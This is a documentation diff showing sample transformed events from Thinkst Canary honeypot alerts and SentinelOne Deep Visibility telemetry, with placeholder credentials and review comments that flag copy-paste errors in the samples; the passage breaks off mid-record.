"mysecuredpassword", + "timestamp": 1720684081, + "timestamp_std": "2024-07-11 07:48:01 UTC+0000", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "ip_address": "", + "ippers": "", + "local_time": "2024-07-11 07:47:51", + "logtype": "31001", + "mac_address": "", + "matched_annotations": {}, + "name": "thinkst-canary", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_host_reverse": "vm000000.example.org", + "src_port": "53804" + } + ``` + + + +=== "test_mongo_request" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684078", + "created_std": "2024-07-11 07:47:58 UTC+0000", + "description": "Mongo Authentication Attempt", + "dst_host": "5.6.7.8", + "dst_host_public_ip": "", + "dst_port": "22", + "cmd": "insert", + "db": "mydatabase", + "user": "myuser", + "password": "mysecuredpassword", + "timestamp": 1720684081, + "timestamp_std": "2024-07-11 07:48:01 UTC+0000", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "ip_address": "", + "ippers": "", + "local_time": "2024-07-11 07:47:51", + "logtype": "28002", + "mac_address": "", + "matched_annotations": {}, + "name": "thinkst-canary", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_host_reverse": "vm000000.example.org", + "src_port": "53804" + } + ``` + + + +=== "test_mssql_login_attempt" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684078", + "created_std": "2024-07-11 07:47:58 UTC+0000", + "description": "MSSQL Login Attempt", + "dst_host": "5.6.7.8", + "dst_host_public_ip": "", + "dst_port": "22", + "HOSTNAME": "mssql.example.com", + "APPNAME": "sqlcmd", + "USERNAME": "myuser", + "PASSWORD": "mysecuredpassword", + "SERVERNAME": "1.2.3.4", + "timestamp": 
1720684081, + "timestamp_std": "2024-07-11 07:48:01 UTC+0000", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "ip_address": "", + "ippers": "", + "local_time": "2024-07-11 07:47:51", + "logtype": "9001", + "mac_address": "", + "matched_annotations": {}, + "name": "thinkst-canary", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_host_reverse": "vm000000.example.org", + "src_port": "53804" + } + ``` + + + +=== "test_mysql_login_attempt" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684078", + "created_std": "2024-07-11 07:47:58 UTC+0000", + "description": "MYSQL Login Attempt", + "dst_host": "5.6.7.8", + "dst_host_public_ip": "", + "dst_port": "22", + "CLIENT_HASH": "adc83b19e793491b1c6ea0fd8b46cd9f32e592fc", + "SALT": "18cebe27dc51ad8114db58ef50cf2915c66a1f94", + "USERNAME": "myuser", + "PASSWORD": "mysecuredpassword", + "timestamp": 1720684081, + "timestamp_std": "2024-07-11 07:48:01 UTC+0000", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "ip_address": "", + "ippers": "", + "local_time": "2024-07-11 07:47:51", + "logtype": "8001", + "mac_address": "", + "matched_annotations": {}, + "name": "thinkst-canary", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_host_reverse": "vm000000.example.org", + "src_port": "53804" + } + ``` + + + +=== "test_shared_file_opened" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684078", + "created_std": "2024-07-11 07:47:58 UTC+0000", + "description": "Shared File Opened", + "dst_host": "5.6.7.8", + "dst_host_public_ip": "", + "USER": "jdoe", + "FILENAME": "myimportantfile", + "AUDITACTION": "pread", + "DOMAIN": "EXAMPLE", + "LOCALNAME": "hostname", + "MODE": "domain", 
+ "OFFSET": 0, + "REMOTENAME": "CANARY", + "SHARENAME": "ImportantStuff", + "SIZE": 1800, + "STATUS": "OK", + "SMBARCH": "11", + "SMBVER": "1.0.0", + "timestamp": 1720684081, + "timestamp_std": "2024-07-11 07:48:01 UTC+0000", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "ip_address": "", + "ippers": "", + "local_time": "2024-07-11 07:47:51", + "logtype": "5000", + "mac_address": "", + "matched_annotations": {}, + "name": "thinkst-canary", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_host_reverse": "vm000000.example.org", + "src_port": "53804" + } + ``` + + + +=== "test_ssh_login_attempt" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684078", + "created_std": "2024-07-11 07:47:58 UTC+0000", + "description": "SSH Login Attempt", + "dst_host": "5.6.7.8", + "dst_host_public_ip": "", + "dst_port": "22", + "LOCALVERSION": "SSH-2.0-MS_1.100", + "PASSWORD": "mypasswordverysecured", + "REMOTEVERSION": "SSH-2.0-libssh2_1.10.1_DEV", + "USERNAME": "jdoe", + "timestamp": 1720684081, + "timestamp_std": "2024-07-11 07:48:01 UTC+0000", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "ip_address": "", + "ippers": "", + "local_time": "2024-07-11 07:47:51", + "logtype": "4002", + "mac_address": "", + "matched_annotations": {}, + "name": "thinkst-canary", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_host_reverse": "vm000000.example.org", + "src_port": "53804" + } + ``` + + + +=== "test_tftp_request" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684078", + "created_std": "2024-07-11 07:47:58 UTC+0000", + "description": "TFTP Request", + "dst_host": "5.6.7.8", + "dst_host_public_ip": "", + "FILENAME": 
"accounting2024.pdf", + "OPCODE": "READ", + "MODE": "netascii", + "timestamp": 1720684081, + "timestamp_std": "2024-07-11 07:48:01 UTC+0000", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "ip_address": "", + "ippers": "", + "local_time": "2024-07-11 07:47:51", + "logtype": "10001", + "mac_address": "", + "matched_annotations": {}, + "name": "thinkst-canary", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_host_reverse": "vm000000.example.org", + "src_port": "53804" + } + ``` + + + +=== "test_winrm_login_attempt" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684078", + "created_std": "2024-07-11 07:47:58 UTC+0000", + "description": "SSH Login Attempt", + "dst_host": "5.6.7.8", + "dst_host_public_ip": "", + "dst_port": "22", + "WORKSTATION": "desktop001", + "PASSWORD": "mypasswordverysecured", + "DOMAINNAME": "EXAMPLE", + "AUTHTYPE": "digest", + "USERNAME": "jdoe", + "timestamp": 1720684081, + "timestamp_std": "2024-07-11 07:48:01 UTC+0000", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "ip_address": "", + "ippers": "", + "local_time": "2024-07-11 07:47:51", + "logtype": "4002", + "mac_address": "", + "matched_annotations": {}, + "name": "thinkst-canary", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_host_reverse": "vm000000.example.org", + "src_port": "53804" + } + ``` + + + diff --git a/_shared_content/operations_center/integrations/generated/8a9894f8-d7bc-4c06-b96a-8808b3c6cade.md b/_shared_content/operations_center/integrations/generated/8a9894f8-d7bc-4c06-b96a-8808b3c6cade.md index 92fc16a02e..ecb78487e2 100644 --- a/_shared_content/operations_center/integrations/generated/8a9894f8-d7bc-4c06-b96a-8808b3c6cade.md +++ b/_shared_content/operations_center/integrations/generated/8a9894f8-d7bc-4c06-b96a-8808b3c6cade.md 
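Review bot: the `test_winrm_login_attempt` sample is mislabelled: it carries `"description": "SSH Login Attempt"` and `"logtype": "4002"`, both identical to `test_ssh_login_attempt`, while its payload fields (`WORKSTATION`, `DOMAINNAME`, `AUTHTYPE`) are WinRM-specific, so the description and logtype look copied from the SSH fixture and never updated; an analyst keying a rule on `logtype` would classify this WinRM event as SSH. The same copy-paste pattern shows elsewhere in this hunk: `test_http_proxy_request` reuses `"logtype": "3001"` from `test_http_login_attempt`, almost every non-SSH sample (HTTP, LDAP, Mongo, MSSQL, MySQL) reports `"dst_port": "22"`, and every event reuses the single `incident_id` `incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212` even for events such as `Host Port Scan` that are not canarytoken incidents. Since this section documents how each event type is transformed for detection and hunting, each fixture should carry a description, logtype and destination port that match its service; please also align the tab names with the `.json` suffix convention used by the other generated pages (`test_host_port_scan` vs `test_conf_events.json`).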
@@ -27,7 +27,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_conf_events.json" diff --git a/_shared_content/operations_center/integrations/generated/8c1bee36-d516-42f9-9b6f-a8e4dcac3d1d.md b/_shared_content/operations_center/integrations/generated/8c1bee36-d516-42f9-9b6f-a8e4dcac3d1d.md deleted file mode 100644 index 2e64cb2ea8..0000000000 --- a/_shared_content/operations_center/integrations/generated/8c1bee36-d516-42f9-9b6f-a8e4dcac3d1d.md +++ /dev/null 
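Review bot: this link rewrite from `/docs/xdr/features/...` to `/xdr/features/...` is applied by hand to a file under `integrations/generated/`, so the next regeneration run will reintroduce the old `/docs/` prefix unless the same change is made in the template that emits the "Transformed Events Samples after Ingestion" paragraph; the fix belongs in the generator, with the generated files refreshed from it. Please also confirm that the three absolute targets (`/xdr/features/detect/rules_catalog`, `/xdr/features/investigate/events`, `/xdr/features/detect/sigma`) resolve under the site's current base path, since the diff gives no indication of whether the docs root moved or the links were simply wrong before.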
@@ -1,3255 +0,0 @@ - -### Event Categories - - -The following table lists the data source offered by this integration. - -| Data Source | Description | -| ----------- | ------------------------------------ | -| `Network intrusion detection system` | SentinelOne Deep Visibility uses kernel based network monitoring to identify threats. | - - - - - - - - -### Transformed Events Samples after Ingestion - -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. - -=== "behavioral_indicators.json" - - ```json - - { - "message": "{\"meta\": {\"uuid\": \"f63008e522ce40c9afd4348634b5ab3b\", \"traceId\": \"01FFQB788MA7GG70KGC1DSQ6ZT\", \"agentVersion\": \"S1-WIN/21.7.1.240\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"19042\", \"computerName\": \"LAPTOP-TECH20\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"timestamp\": {\"millisecondsSinceEpoch\": \"1631797347671\"}, \"event_type\": \"behavioralIndicators\", \"source\": {\"node\": {\"key\": {\"value\": \"7DC20CD7D1BEDF9F\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"05893E5943D0005C\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"1630573198477\"}, \"path\": \"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"2465624\", \"signature\": {\"signed\": {\"identity\": \"GOOGLE LLC\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"a82705f4f5d1408f7c14d16a9cbe26c509422b29\", \"sha256\": 
\"07832d5f6344bd4d68376a6ca3c5baabb9cef7166a3752268e73fadffb07ddff\", \"md5\": \"a766188d75e570ea3f9b09fb9d82cb54\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"\\\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1744,7600736140352570522,3112921143749416041,131072 --lang=fr --service-sandbox-type=icon_reader --mojo-platform-channel-handle=30744 /prefetch:8\", \"fullPid\": {\"pid\": 19720, \"startTime\": {\"millisecondsSinceEpoch\": \"1631797347668\"}}, \"user\": {\"name\": \"CORP\\\\user.name\", \"sid\": \"S-1-5-21-3542462677-1213864171-2030164332-6187\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"0D7A69B0C2C26E73\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"05893E5943D0005C\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"1630573198477\"}, \"path\": \"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"2465624\", \"signature\": {\"signed\": {\"identity\": \"GOOGLE LLC\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"a82705f4f5d1408f7c14d16a9cbe26c509422b29\", \"sha256\": \"07832d5f6344bd4d68376a6ca3c5baabb9cef7166a3752268e73fadffb07ddff\", \"md5\": \"a766188d75e570ea3f9b09fb9d82cb54\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"\\\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\"\", \"fullPid\": {\"pid\": 26188, \"startTime\": {\"millisecondsSinceEpoch\": \"1631516876708\"}}, \"user\": {\"name\": \"CORP\\\\user.name\", \"sid\": \"S-1-5-21-3542462677-1213864171-2030164332-6187\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"41CA3A862279A7BC\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Google Chrome\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", \"sessionId\": 1, \"integrityLevel\": \"MEDIUM\", \"isWow64\": \"E_FALSE\", 
\"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"6B188EE5E8C5F24F\"}}, \"counters\": {\"modelChildProcess\": 1804, \"osChildProcess\": 1804, \"crossProcess\": 590449, \"moduleLoad\": 2112, \"fileCreation\": 490788, \"fileDeletion\": 466017, \"fileModification\": 1403458, \"exeModification\": 1, \"netConnOut\": 12, \"registryModification\": 1847, \"crossProcessDupThreadHandle\": 5290, \"crossProcessDupProcessHandle\": 585159, \"dnsLookups\": 16}}, \"excluded\": \"E_FALSE\", \"name\": \"Google Chrome\", \"root\": \"E_FALSE\", \"subsystem\": \"SYS_WIN32\", \"sessionId\": 1, \"integrityLevel\": \"LOW\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"6B188EE5E8C5F24F\"}}, \"counters\": {\"moduleLoad\": 70, \"registryModification\": 1}}, \"indicator\": \"WD109\", \"metadata\": \"To Process[ Name: \\\"chrome.exe\\\", Pid: \\\"19720\\\", UID: \\\"7DC20CD7D1BEDF9F\\\", TrueContextID: \\\"6B188EE5E8C5F24F\\\", IntegrityLevel: \\\"Low\\\", RelationToSource: \\\"Child\\\" ], File Path: \\\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\"\", \"category\": \"BI_EVASION\", \"classification\": \"PUA\", \"description\": \"Code injection to other process memory space during the target process' initialization\", \"friendlyName\": \"PreloadInjection\", \"tactics\": [{\"name\": \"Defense Evasion\", \"source\": \"MITRE\", \"techniques\": [{\"name\": \"T1055.012\", \"link\": \"https://attack.mitre.org/techniques/T1055/012/\"}]}, {\"name\": \"Privilege Escalation\", \"source\": \"MITRE\", \"techniques\": [{\"name\": \"T1055.012\", \"link\": \"https://attack.mitre.org/techniques/T1055/012/\"}]}], \"longDescription\": \"Code injection to other process memory space during the target process' initialization MITRE: Defense Evasion {T1055.012}, Privilege Escalation {T1055.012}\"}", - "event": { - "action": "behavioralIndicators", - "start": 
"2021-09-16T13:02:27.671000Z" - }, - "agent": { - "version": "S1-WIN/21.7.1.240" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "trace_id": "01FFQB788MA7GG70KGC1DSQ6ZT", - "uuid": "f63008e522ce40c9afd4348634b5ab3b" - }, - "event": { - "type": "behavioralIndicators" - }, - "host": { - "os": { - "revision": "19042" - } - }, - "indicator": { - "category": "BI_EVASION", - "classification": "PUA", - "description": "Code injection to other process memory space during the target process' initialization", - "id": "WD109", - "metadata": "To Process[ Name: \"chrome.exe\", Pid: \"19720\", UID: \"7DC20CD7D1BEDF9F\", TrueContextID: \"6B188EE5E8C5F24F\", IntegrityLevel: \"Low\", RelationToSource: \"Child\" ], File Path: \"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"", - "name": "PreloadInjection", - "tactics": [ - { - "name": "Defense Evasion", - "source": "MITRE", - "techniques": [ - { - "link": "https://attack.mitre.org/techniques/T1055/012/", - "name": "T1055.012" - } - ] - }, - { - "name": "Privilege Escalation", - "source": "MITRE", - "techniques": [ - { - "link": "https://attack.mitre.org/techniques/T1055/012/", - "name": "T1055.012" - } - ] - } - ] - }, - "process": { - "counters": { - "module_load": 70, - "registry_modification": 1 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "node": { - "key": "05893E5943D0005C" - }, - "signature": { - "signed": { - "identity": "GOOGLE LLC" - } - }, - "size_bytes": "2465624", - "start": "2021-09-02T08:59:58.477000Z" - }, - "family": "SYS_WIN32", - "integrity_level": "LOW", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "7DC20CD7D1BEDF9F" - }, - "parent": { - "counters": { - "cross_process": 590449, - "cross_process_dup_process_handle": 585159, - "cross_process_dup_thread_handle": 5290, - 
"dns_lookups": 16, - "file_creation": 490788, - "file_deletion": 466017, - "file_modification": 1403458, - "model_child_process": 1804, - "module_load": 2112, - "net_conn_out": 12, - "os_child_process": 1804, - "registry_modification": 1847 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "node": { - "key": "05893E5943D0005C" - }, - "signature": { - "signed": { - "identity": "GOOGLE LLC" - } - }, - "size_bytes": "2465624", - "start": "1630573198477" - }, - "family": "SYS_WIN32", - "integrity_level": "MEDIUM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "0D7A69B0C2C26E73" - }, - "parent": { - "node": { - "key": "41CA3A862279A7BC" - } - }, - "root": "E_TRUE", - "session_id": 1, - "true_context": { - "key": "6B188EE5E8C5F24F" - }, - "user": { - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6187" - } - }, - "root": "E_FALSE", - "session_id": 1, - "true_context": { - "key": "6B188EE5E8C5F24F" - }, - "user": { - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6187" - } - } - }, - "host": { - "name": "LAPTOP-TECH20", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "process": { - "command_line": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1744,7600736140352570522,3112921143749416041,131072 --lang=fr --service-sandbox-type=icon_reader --mojo-platform-channel-handle=30744 /prefetch:8", - "executable": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "hash": { - "md5": "a766188d75e570ea3f9b09fb9d82cb54", - "sha1": "a82705f4f5d1408f7c14d16a9cbe26c509422b29", - "sha256": "07832d5f6344bd4d68376a6ca3c5baabb9cef7166a3752268e73fadffb07ddff" - }, - "name": "chrome.exe", - "parent": { - "command_line": "\"C:\\Program 
Files\\Google\\Chrome\\Application\\chrome.exe\"", - "hash": { - "md5": "a766188d75e570ea3f9b09fb9d82cb54", - "sha1": "a82705f4f5d1408f7c14d16a9cbe26c509422b29", - "sha256": "07832d5f6344bd4d68376a6ca3c5baabb9cef7166a3752268e73fadffb07ddff" - }, - "name": "chrome.exe", - "pid": 26188, - "title": "Google Chrome", - "working_directory": "C:\\Program Files\\Google\\Chrome\\Application" - }, - "pid": 19720, - "start": "2021-09-16T13:02:27.668000Z", - "title": "Google Chrome", - "working_directory": "C:\\Program Files\\Google\\Chrome\\Application" - }, - "related": { - "hash": [ - "07832d5f6344bd4d68376a6ca3c5baabb9cef7166a3752268e73fadffb07ddff", - "a766188d75e570ea3f9b09fb9d82cb54", - "a82705f4f5d1408f7c14d16a9cbe26c509422b29" - ], - "user": [ - "CORP\\user.name" - ] - }, - "user": { - "id": "S-1-5-21-3542462677-1213864171-2030164332-6187", - "name": "CORP\\user.name" - } - } - - ``` - - -=== "event_dns.json" - - ```json - - { - "message": "{\"meta\": {\"seqId\": 35, \"uuid\": \"4d311e18709146cba8797a22e3c20762\", \"traceId\": \"BA1BE2835D6E4FF7B023C72DCE8B3829\", \"agentVersion\": \"S1-WIN/4.6.14.304\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"19042\", \"computerName\": \"LAPTOP-COM13\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"timestamp\": {\"millisecondsSinceEpoch\": \"1628516010404\"}, \"trueContext\": {\"key\": {\"value\": \"C20F3967ACBB2FE7\"}}, \"source\": {\"node\": {\"key\": {\"value\": \"87E0B0E05D9D6CC8\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"C8E88AA83F5B15B6\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"1628149542879\"}, \"path\": \"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"2442584\", \"signature\": {\"signed\": {\"identity\": \"GOOGLE LLC\", \"valid\": {}}}, \"hashes\": {}, \"fileLocation\": \"Local\"}, \"commandLine\": \"\\\"C:\\\\Program 
Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1692,16822032697640791725,9639588106693567222,131072 --lang=fr --service-sandbox-type=none --mojo-platform-channel-handle=2056 /prefetch:8\", \"fullPid\": {\"pid\": 13796, \"startTime\": {\"millisecondsSinceEpoch\": \"1628515734223\"}}, \"user\": {\"name\": \"CLIENT\\\\t.Naohisa\", \"sid\": \"S-1-5-21-1525252525-7987987987-1111111111-6174\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"BAE25D38782A6941\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Google Chrome\", \"root\": \"E_FALSE\", \"subsystem\": \"SYS_WIN32\", \"sessionId\": 11, \"integrityLevel\": \"MEDIUM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"C20F3967ACBB2FE7\"}}, \"counters\": {\"moduleLoad\": 90, \"fileCreation\": 45, \"fileDeletion\": 19, \"fileModification\": 101, \"netConnOut\": 31, \"dnsLookups\": 35}}, \"query\": \"lh5.googleusercontent.com\", \"results\": \"type: 5 googlehosted.l.googleusercontent.com;142.250.179.65;\", \"event_type\": \"dns\"}", - "event": { - "action": "dns", - "start": "2021-08-09T13:33:30.404000Z" - }, - "agent": { - "version": "S1-WIN/4.6.14.304" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "seq_id": 35, - "trace_id": "BA1BE2835D6E4FF7B023C72DCE8B3829", - "uuid": "4d311e18709146cba8797a22e3c20762" - }, - "dns": { - "answers": { - "results": "type: 5 googlehosted.l.googleusercontent.com;142.250.179.65;" - } - }, - "event": { - "type": "dns" - }, - "host": { - "os": { - "revision": "19042" - } - }, - "process": { - "counters": { - "dns_lookups": 35, - "file_creation": 45, - "file_deletion": 19, - "file_modification": 101, - "module_load": 90, - "net_conn_out": 31 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - 
"name": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "node": { - "key": "C8E88AA83F5B15B6" - }, - "signature": { - "signed": { - "identity": "GOOGLE LLC" - } - }, - "size_bytes": "2442584", - "start": "2021-08-05T07:45:42.879000Z" - }, - "family": "SYS_WIN32", - "integrity_level": "MEDIUM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "87E0B0E05D9D6CC8" - }, - "parent": { - "node": { - "key": "BAE25D38782A6941" - } - }, - "root": "E_FALSE", - "session_id": 11, - "true_context": { - "key": "C20F3967ACBB2FE7" - }, - "user": { - "sid": "S-1-5-21-1525252525-7987987987-1111111111-6174" - } - }, - "true_context": { - "key": "C20F3967ACBB2FE7" - } - }, - "dns": { - "question": { - "name": "lh5.googleusercontent.com", - "registered_domain": "googleusercontent.com", - "subdomain": "lh5", - "top_level_domain": "com" - } - }, - "host": { - "name": "LAPTOP-COM13", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "process": { - "command_line": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1692,16822032697640791725,9639588106693567222,131072 --lang=fr --service-sandbox-type=none --mojo-platform-channel-handle=2056 /prefetch:8", - "executable": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "name": "chrome.exe", - "pid": 13796, - "start": "2021-08-09T13:28:54.223000Z", - "title": "Google Chrome", - "working_directory": "C:\\Program Files\\Google\\Chrome\\Application" - }, - "related": { - "hosts": [ - "lh5.googleusercontent.com" - ], - "user": [ - "CLIENT\\t.Naohisa" - ] - }, - "user": { - "id": "S-1-5-21-1525252525-7987987987-1111111111-6174", - "name": "CLIENT\\t.Naohisa" - } - } - - ``` - - -=== "file_creation.json" - - ```json - - { - "message": "{\"meta\": {\"seqId\": 35, \"uuid\": \"4d311e18709146cba871111111111111\", 
\"traceId\": \"BABABABABEEE43452345234523423423\", \"agentVersion\": \"S1-WIN/2.2.11.333\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"88888\", \"computerName\": \"LAPTOP-COM13\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"timestamp\": {\"millisecondsSinceEpoch\": \"7474746212121\"}, \"trueContext\": {\"key\": {\"value\": \"CCC43343435EABDF\"}}, \"source\": {\"node\": {\"key\": {\"value\": \"BAE25D38782A6941\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"C8E88AA83F5B15B6\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"1628149542456\"}, \"path\": \"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"2442584\", \"signature\": {\"signed\": {\"identity\": \"GOOGLE LLC\", \"valid\": {}}}, \"hashes\": {}, \"fileLocation\": \"Local\"}, \"commandLine\": \"\\\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\"\", \"fullPid\": {\"pid\": 14896, \"startTime\": {\"millisecondsSinceEpoch\": \"1628515733321\"}}, \"user\": {\"name\": \"CORP\\\\user.name\", \"sid\": \"S-1-5-21-6562365326-8585787878-2021012021-6543\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"03267F6915111A61\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Google Chrome\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", \"sessionId\": 11, \"integrityLevel\": \"MEDIUM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"CCC43343435EABDF\"}}, \"counters\": {\"modelChildProcess\": 25, \"osChildProcess\": 25, \"crossProcess\": 1610, \"moduleLoad\": 245, \"fileCreation\": 148, \"fileDeletion\": 58, \"fileModification\": 416, \"registryModification\": 32, \"crossProcessDupThreadHandle\": 20, \"crossProcessDupProcessHandle\": 1590}}, \"targetFile\": {\"node\": {\"key\": {\"value\": 
